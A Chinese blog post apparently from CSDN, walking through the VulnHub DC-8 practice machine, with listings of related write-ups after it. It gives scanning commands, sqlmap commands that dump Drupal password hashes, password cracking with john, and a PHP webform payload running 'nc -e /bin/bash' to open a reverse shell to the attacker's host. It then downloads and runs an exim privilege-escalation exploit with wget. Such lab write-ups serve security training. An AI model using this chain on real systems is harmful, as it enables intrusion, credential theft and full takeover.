vulnhub-dc8

已于 2022-09-30 14:16:18 修改
阅读量158 收藏 1
点赞数
分类专栏: 内网 vulnhub 文章标签: web安全 linux
于 2022-09-30 14:10:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55654781/article/details/127122648
版权

靶机地址

https://www.vulnhub.com/?q=dc-

打开靶机,设置为同一种nat模式

kali 信息收集主机发现 ,并扫描该主机ip

arp-scan -l
nmap -p- -sV 192.168.1.206

在这里插入图片描述

访问页面,扫描该网站目录,没有发现有用界面

dirb http://192.168.1.206 |grep -v 403

在这里插入图片描述

访问网页,发现nid在变化,尝试手工注入发现报错

在这里插入图片描述

通过sqlmap注入,查询到数据库为d7db information_schema

python sqlmap.py -u "http://192.168.1.206/?nid=3"  --dbs --batch 查询数据库

在这里插入图片描述

查询表:
python sqlmap.py -u "http://192.168.1.206/?nid=3" --batch -D d7db --tables
查询列
python sqlmap.py -u "http://192.168.1.206/?nid=3"  -D d7db -T users --columns
查询用户密码
python sqlmap.py -u "http://192.168.1.206/?nid=3"  -D d7db -T users -C "uid,name,pass" --dump

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

admin   $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 
john    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

将hash值放入2.txt,利用工具john爆破密码为turtle

john --wordlist=/usr/share/john/password.lst --rules 2.txt

在这里插入图片描述

ssh无法登录,尝试网页后台登录界面

在这里插入图片描述

远程代码执行

在Find content => WEBFROM => Form settings中可以编写shell,其中p标签中的东西不要删除

<?php
system("nc -e /bin/bash 192.168.1.162 1234");
?>

在这里插入图片描述

开启监听后,提交页面,接收反弹后开启交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

find 命令查找具有sudo 权限的命令,发现exim4,查询版本

find / -perm -u=s -type f 2>/dev/null
exim4 --version

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rIpDrtmb-1664518032030)(../../../../img/dc8/11.png)]

在这里插入图片描述

serachsploit查找exim命令的漏洞,复制到本地并改名为exp.sh

serachsploit exim
cp /usr/share/exploitdb/exploits/linux/local/46996.sh exp.sh

在这里插入图片描述

查看文件是否为linux可执行文件,如果为dos修改为unix,开启http服务,在交互式下远程下载exp.sh,进入/tmp目录下载

set ff? 
python3 -m http.server 80
wget http://192.168.1.162:8000/exp.sh

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Uv91UzOD-1664518032033)(../../../../img/dc8/14.png)]

给exp.sh执行权限,执行

chmod 777 exp.sh
./exp.sh -m netcat

在这里插入图片描述

进入root目录查看flag

在这里插入图片描述
参考链接
https://blog.csdn.net/weixin_45744814/article/details/120113301

人机(未转人工)
关注
专栏目录
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1684
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
靶机实操:vulnhub-DC3
不想当脚本小子的脚本小子
12-06 187
今天继续趁着回家来用DC练练手。照旧先是扫一下内网主机,我一般喜欢先找一下存活的主机然后再查看具体的信息,扫描到IP为192.168.249.135。只开放了80端口 访问网页长这样:发现有一个右下角forget操作,一会看看这里有没有可以操作的地方。CMS是Joomla,中间件会不会存在漏洞? 接下来常规操作。查看robots没东西,那再扫扫后台,挑几个觉得有用的打开看看。总觉得最终的落脚点会在刚才的忘记用户名和密码那里,一会看看会不会被打脸哈哈哈哈 登录界面先简单sql..
vulnhubdc8
qq_54030686的博客
06-22 440
各位小伙伴,可直接看这位师傅 个人写的很粗糙 DC8本身的难度较低,可以较为轻松地获取到目标权限,总体思路 主机发现,端口扫描,服务探测 一共开启2个端口,80和22端口,80端口开放的服务为drupal 7,打开界面进行检测,这里利用burpsuit联合xray进行检测 burpsuit的user option操作栏中设置自己闲置代理,运行xray即可,如下图所示这里使用bp自带的浏览器进行测试,然后在界面进行点击,每一个功能点都要点击下 点击到 该界面时候,xray检测到存在sql注入,直接上sqlma
vulnhub靶机之DC8
timesleep的博客
03-08 132
kali IP 192.168.208 我们首先扫描靶机IP 靶机IP为192.168.99.223 然后我们对他的端口进行扫描 然后我们看到他只有22和80端口 访问80然后信息收集 发现点击这里的时候会发现网页的变化所以我推断他可能会有sql注入我们收集一下错误信息 然后我们用sqlmap试着跑一下 sqlmap -u "http://192.168.99.223/?nid=2" --dbs --level 3 最好跑出来的结果 sqlmap -u "http://192.168.9
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2316
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
靶机 Raven2 / UDF 提权
weixin_51559599的博客
10-14 117
动态链接库 udf 提权find 提权suid。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3043
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
VulnHub DC-1
weixin_45682839的博客
04-13 369
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub靶机实战——DC-8
冠霖L的博客
10-30 3465
靶机DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Kali的IP地址:192.168.220.155 DC-8靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ...
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4708
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
SearchSploit漏洞查找工具使用指南
大方子
10-04 7665
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
记一次在实战靶机中使用`SearchSploit`的总结
weixin_34268310的博客
10-07 1002
记一次在实战靶机中使用SearchSploit的总结 本文首发:记一次在实战靶机中使用SearchSploit的总结:https://xz.aliyun.com/t/2857 什么是SearchSploit? GitHub上的漏洞数据库存储库中包含 “searchsploit”,这是一个Exploit-DB的命令行搜索工具,它还允许您随身携带漏洞利用数据...
SearchSploit
子曰小玖的博客
07-23 1286
SearchSploit – The Manual Included in ourExploit Database repository on GitHubissearchsploit, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with...
MySQL_UDF提权实验
多喝i热水的博客
11-13 4202
目录 0.环境下载: 1.扫描存活主机 2.目录猜解 3.反弹SHELL 0.环境下载: https://www.vulnhub.com/entry/raven-2,269/ 1.扫描存活主机 nmap -sn 192.168.217.0/24 2.目录猜解 dirb http://192.168.217.141/ http://192.168.217.141/vender 同时目录下还存在一个PHPMailerAutoload.php的文件,配合起来看应该是使用了5.2.16版本的
searchsploit使用
热门推荐
qq_38243607的博客
07-05 1万+
“searchsploit”是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。 Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,利用上面提到的命令就可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。 基本搜索方法就是searchsploit+可能包含漏洞的软件/系统等等,对应回显存在的漏洞和用于渗透的脚本。 参数 直接输入searchspliot可以看到该命令相关的参数:
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 510
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值